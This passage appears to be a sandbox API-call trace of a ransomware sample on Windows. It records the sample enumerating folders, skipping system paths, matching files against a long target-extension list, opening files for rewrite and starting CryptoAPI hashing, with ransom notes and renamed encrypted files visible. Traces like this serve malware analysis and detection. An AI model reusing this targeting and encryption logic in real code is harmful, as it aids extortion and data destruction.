	[0173.633] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="programdata") returned 0x0
	[0173.633] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0173.633] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0173.633] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x80f00294, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8103170f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0173.633] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0173.633] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eb3c55, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x80eb3c55, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80eb3c55, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x8c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="CUSTOM~1.SCL")) returned 1
	[0173.633] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8103170f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8103170f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8103170f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0173.634] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8100b23b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8100b23b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8103170f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0173.634] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80f00294, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x80f00294, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80f00294, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="MASTER~1.SCL")) returned 1
	[0173.634] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0173.634] lstrcmpW (lpString1="Prov", lpString2="..") returned 1
	[0173.634] lstrcmpW (lpString1="Prov", lpString2=".") returned 1
	[0173.634] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}"
	[0173.634] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\"
	[0173.634] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\", lpString2="Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov"
	[0173.634] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov"
	[0173.635] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\"
	[0173.635] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\"
	[0173.635] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\*.*"
	[0173.635] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0173.635] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\*.*") returned 89
	[0173.635] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.636] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*") returned 0x59
	[0173.636] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.636] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0173.636] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.636] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0173.636] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.636] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0173.636] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.637] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.637] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.637] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0173.637] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.637] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0173.637] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.637] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.640] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.640] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0173.640] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.640] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0173.641] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.641] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0173.641] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.641] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0173.641] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.641] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0173.641] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.642] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.642] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.642] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0173.642] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.642] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0173.642] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.642] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0173.643] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.643] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0173.643] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.643] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0173.643] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.643] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0173.643] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName="..", cAlternateFileName="")) returned 1
	[0173.644] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0173.644] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0c7056c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0c7056c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0c7056c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x340062, dwReserved1=0x7d0065, cFileName="RunTime.xml", cAlternateFileName="")) returned 1
	[0173.644] lstrcmpW (lpString1="RunTime.xml", lpString2="..") returned 1
	[0173.644] lstrcmpW (lpString1="RunTime.xml", lpString2=".") returned 1
	[0173.644] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\"
	[0173.644] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\", lpString2="RunTime.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml"
	[0173.644] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml") returned 97
	[0173.644] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.644] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml") returned 0x61
	[0173.645] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.645] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0173.645] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml"
	[0173.645] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml") returned 97
	[0173.645] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.645] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.646] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0173.646] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.646] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0173.646] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.646] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.646] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.647] ReadFile (in: hFile=0x39c, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x15c, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x189930*=0x15c, lpOverlapped=0x0) returned 1
	[0173.651] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.651] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcae68) returned 1
	[0173.655] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.655] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0173.655] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.655] CryptHashData (hHash=0xfb8ff0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
